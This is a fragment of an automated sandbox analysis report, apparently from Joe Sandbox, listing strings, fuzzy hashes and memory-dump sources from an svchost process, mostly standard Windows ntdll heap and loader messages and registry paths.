                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      Strings
                                                                                                                      • HEAP[%wZ]: , xrefs: 03031712
                                                                                                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03031728
                                                                                                                      • HEAP: , xrefs: 03031596
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $@
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$&$@
                                                                                                                      Strings
                                                                                                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0310B82A
                                                                                                                      • TargetNtPath, xrefs: 0310B82F
                                                                                                                      • GlobalizationUserSettings, xrefs: 0310B834
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                      Strings
                                                                                                                      • HEAP[%wZ]: , xrefs: 0308E6A6
                                                                                                                      • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0308E6C6
                                                                                                                      • HEAP: , xrefs: 0308E6B3
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                      Strings
                                                                                                                      • Heap block at %p modified at %p past requested size of %Ix, xrefs: 030DDC32
                                                                                                                      • HEAP[%wZ]: , xrefs: 030DDC12
                                                                                                                      • HEAP: , xrefs: 030DDC1F
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                      Strings
                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 030A82DE
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 030A82E8
                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 030A82D7
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                      Strings
                                                                                                                      • LdrpAllocateTls, xrefs: 030A1B40
                                                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 030A1B39
                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 030A1B4A
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 030EC1F1
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 030EC1C5
                                                                                                                      • PreferredUILanguages, xrefs: 030EC212
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                      Strings
                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 030B4888
                                                                                                                      • LdrpCheckRedirection, xrefs: 030B488F
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 030B4899
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                      Strings
                                                                                                                      • SXS: %s() passed the empty activation context data, xrefs: 030A29FE
                                                                                                                      • RtlCreateActivationContext, xrefs: 030A29F9
                                                                                                                      • Actx , xrefs: 030633AC
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                      Strings
                                                                                                                      • LdrpInitializeTls, xrefs: 030A1A47
                                                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 030A1A51
                                                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 030A1A40
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                      Strings
                                                                                                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0307127B
                                                                                                                      • @, xrefs: 030712A5
                                                                                                                      • BuildLabEx, xrefs: 0307130F
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                      Strings
                                                                                                                      • LdrpInitializationFailure, xrefs: 030B20FA
                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 030B20F3
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 030B2104
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: #%u
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                      • String ID: kLsE
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      Strings
                                                                                                                      • Failed to retrieve service checksum., xrefs: 0308EE56
                                                                                                                      • ResIdCount less than 2., xrefs: 0308EEC9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                      • API String ID: 0-863616075
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$
                                                                                                                      • API String ID: 0-233714265
                                                                                                                      Strings
                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0303A309
                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0303A2FB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                      • API String ID: 0-2876891731
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .Local\$@
                                                                                                                      • API String ID: 0-380025441
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: MUI
                                                                                                                      • API String ID: 0-1339004836
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: P`vRbv
                                                                                                                      • API String ID: 0-2392986850
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 0-4108050209
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 0-3887548279
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PATH
                                                                                                                      • API String ID: 0-1036084923
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3916222277
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: yxxx
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalTags
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: yxxx
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EXT-
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: PreferredUILanguages
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: BinaryHash
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: verifier.dll
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Actx
                                                                                                                      • API String ID: 0-89312691
                                                                                                                      • Opcode ID: b0be5488eaa43b68f54937da00b9d90900c1f5f23c46c96db766b3001a1f7fcd
                                                                                                                      • Instruction ID: a39ed2375f79d8d2b769ab9594492ea9c8c147f26f82a295721ac18d7508b499
                                                                                                                      • Opcode Fuzzy Hash: b0be5488eaa43b68f54937da00b9d90900c1f5f23c46c96db766b3001a1f7fcd
                                                                                                                      • Instruction Fuzzy Hash: D41166307075028BEB64C91D8C516BAF2DDEB97264F3C492AD451CB3B1D673D8418780
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0ac7564ea8a35b6c2e7e1a05ee6489b70892fe00347a65bdf56e5cb961a42aba
                                                                                                                      • Instruction ID: 4085d360ace4c7b0517a40027efb799f807afa12d5d64a1cd2efdaed4a611623
                                                                                                                      • Opcode Fuzzy Hash: 0ac7564ea8a35b6c2e7e1a05ee6489b70892fe00347a65bdf56e5cb961a42aba
                                                                                                                      • Instruction Fuzzy Hash: 80824472F102188BCB58CFADDC916DDB7F2EF88314B19812DE416EB349DA34AC568B45
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 075f7a4758ae7b780609c925abc9a58ed24efbc524900986108974868b961305
                                                                                                                      • Instruction ID: 85e923949842ce076e431d66af8af00c764607a86a73b7f4bef0b7b8d846a4bb
                                                                                                                      • Opcode Fuzzy Hash: 075f7a4758ae7b780609c925abc9a58ed24efbc524900986108974868b961305
                                                                                                                      • Instruction Fuzzy Hash: F3628132D0664AAFCF24CF08D8904EEFBA2FE56314B49C59CC89A27604D371B955CBD9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7eb5aed3955f605c5b7548740e048c3ed2b4b268efe91a8d6a29b1027f8205d1
                                                                                                                      • Instruction ID: 49e6e51195824f672b8696c59d89f19a50d184ea50c1eeee63c2c1d8cd9d9860
                                                                                                                      • Opcode Fuzzy Hash: 7eb5aed3955f605c5b7548740e048c3ed2b4b268efe91a8d6a29b1027f8205d1
                                                                                                                      • Instruction Fuzzy Hash: C042D375A026168FDB18DF59C4806BEF7F6FF88B14B28856DD592AB344D730E842CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                      • Instruction ID: eb35deafee5a148e98e8bfd7d17763f272ec6adeb0cd97324e3dbf259a8d3c2a
                                                                                                                      • Opcode Fuzzy Hash: 86e1fc953f9734f122b5cf9138eeacf0118e62c53451ba632b2d76c7faa63c28
                                                                                                                      • Instruction Fuzzy Hash: 89128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
Memory Dump Source
• Source File: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, Offset: 02660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2660000_svchost.jbxd
Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                      • Instruction ID: c9b085b4c83f5de98b0b51438de3c2cc393460a0ed5f3417b854879ebbfa8b88
                                                                                                                      • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                      • Instruction Fuzzy Hash: 11026E73E547164FE720DE4ACDC4765B3A3EFC8311F5B81B8CA142B613CA39BA525A90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0209d6c0643eac48232475be1cc6da9855622741d12e88e44abf27943a4b3468
                                                                                                                      • Instruction ID: a8b9758fefbe13c39e023b5f49e55463c7503aa4f0c784dee5beb78217c21223
                                                                                                                      • Opcode Fuzzy Hash: 0209d6c0643eac48232475be1cc6da9855622741d12e88e44abf27943a4b3468
                                                                                                                      • Instruction Fuzzy Hash: D3F1A673E006269BCB18CF69C9A05BDFBF5AF4921071A4269D856EB3C0D774EE41CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 089a59c152eb2f69006e61fb8c44f548dd971fb79c9f4bc1b90a8bc5019bd61b
                                                                                                                      • Instruction ID: ee1fd64a80163bdd60f490d95839840bb51cbada5eee83c7d9395fd508d528f9
                                                                                                                      • Opcode Fuzzy Hash: 089a59c152eb2f69006e61fb8c44f548dd971fb79c9f4bc1b90a8bc5019bd61b
                                                                                                                      • Instruction Fuzzy Hash: CEF1C274E01609DFDB54DFA8D880BAEB7F5FF48304F1885A9E805AB245E734DA85CB90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: ede714303146304ca0be42729426844294ce78d52d56ef8a13d33325dbc71e25
                                                                                                                      • Instruction ID: aa1835876db254bdf5c2c58d8a64dd0323282c5772348032d6f1779fdbf775c9
                                                                                                                      • Opcode Fuzzy Hash: ede714303146304ca0be42729426844294ce78d52d56ef8a13d33325dbc71e25
                                                                                                                      • Instruction Fuzzy Hash: B6D1D379A027269BCF14DF64C890ABFBBE5FF84304F088629E955DB280E734E954CB50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: be33280380d21a287aa5083962b18ca25955d26cf3e55d0c1aec884032e2680d
                                                                                                                      • Instruction ID: fa7252b2c8c7523a791732648f6cb91b34194bb8cfe49c060eb57a545ef3d02c
                                                                                                                      • Opcode Fuzzy Hash: be33280380d21a287aa5083962b18ca25955d26cf3e55d0c1aec884032e2680d
                                                                                                                      • Instruction Fuzzy Hash: 0BD16971E063198BFF68CE98C5843BFBBF5FB44304F18846AE842AB294D7749981DB44
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8b6f297fa0e3a42d335ff97366071c0ea4d541c6dc68394760e026d0b5c5b7ef
                                                                                                                      • Instruction ID: 0c3a5230599f2b7ff4063204ac91b8ff6d79e0aa05613a403f4b5f227e97ee8b
                                                                                                                      • Opcode Fuzzy Hash: 8b6f297fa0e3a42d335ff97366071c0ea4d541c6dc68394760e026d0b5c5b7ef
                                                                                                                      • Instruction Fuzzy Hash: C5E18EB5A01209DFDB18CF58C880AAEB7F5FF58310F1885A9E555EB391D730EA51CBA0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 07d899bfe9645ffc3de00dd793dccc43ed7f0e30cb845da62d5a67e8ff68c44c
                                                                                                                      • Instruction ID: 9adce39842611a7664c795596c1db79a940a0e5dc229572d27cfe810bb05eb30
                                                                                                                      • Opcode Fuzzy Hash: 07d899bfe9645ffc3de00dd793dccc43ed7f0e30cb845da62d5a67e8ff68c44c
                                                                                                                      • Instruction Fuzzy Hash: DDC1B571E026159BEF24CF5EC840BAEF7F9EF85310F188269D815AB290D770A942CB80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.1964073483.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_3000000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cae8b81e5f3b0e2f4ae39acc43dcbcb9197e04a08b8fe15e1faa34508b69bc33
